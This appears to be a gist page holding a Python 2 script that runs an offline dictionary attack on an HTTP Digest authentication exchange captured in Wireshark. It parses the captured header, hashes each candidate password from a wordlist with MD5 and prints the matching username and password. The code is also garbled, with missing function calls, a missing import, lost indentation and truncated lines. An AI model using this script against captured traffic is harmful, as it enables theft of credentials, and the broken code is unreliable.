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Last active August 29, 2015 14:18
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#Using Python Version 2.7.3
#module used to do regular expressions
import re
#replace string with wireshark output
string = 'Digest username=\"infod\", realm=\"members only\", nonce=\"V8XwF3IRBQA=a0d05646a399aacfd52$
#Prompt to get user input
method = raw_input("Method (POST/GET): ")
password_File = raw_input("Password File Path: ")
#Regular expression used to get realm variable
pos1 ='realm=',string)
regex1 = pos1.end()+1
#Regular expression to get nonce varialbe
pos2 ='nonce=',string)
regex2 = pos2.start()-3
#Regular expressions to get the rest of the variables
raw_Username ='username=\"(\w+)',string).group(0)
realm =string[regex1:regex2]
raw_Nonce ='nonce=\"(\S+)',string).group(0)
nonce_End = len(raw_Nonce)
raw_Uri ='uri="(\S+)',string).group(0)
uri_End = len(raw_Uri)
raw_Qop ='qop=(\w+)',string).group(0)
raw_Nc ='nc=(\w+)',string).group(0)
raw_Cnonce ='cnonce="(\w+)',string).group(0)
raw_Response ='response="(\w+)',string).group(0)
#Process to set variables so they only have needed string
username = raw_Username[10:]
nonce = raw_Nonce[7:nonce_End - 2]
uri = raw_Uri[5:uri_End - 2]
qop = raw_Qop[4:]
nc = raw_Nc[3:]
cnonce = raw_Cnonce[8:]
response = raw_Response[10:]
#Importing the module to use MD5 hash
#creating the hashes for digest calculation
inputData2 = (method + ":" + uri).encode('utf-8')
hash2 = (hashlib.md5(inputData2).hexdigest())
#Opens file, sets the first line the to password, completes the digest algorithm
#If the if the password is the correct one, the hash will match the response from
#Wire Shark and the usernane and password is printed to the console
with open(password_File) as f:
for line in f:
password = line.rstrip()
inputData1 = (username + ":" + realm + ":" + password).encode('utf-8')
hash1 = (hashlib.md5(inputData1).hexdigest())
final_Hash = (hash1 + ":" + nonce + ":" + nc + ":" + cnonce + ":" + qop + ":" + hash$
complete_Hash = (hashlib.md5(final_Hash).hexdigest())
if complete_Hash == response:
print ("username: " + username + "\n" + "password: " + password)
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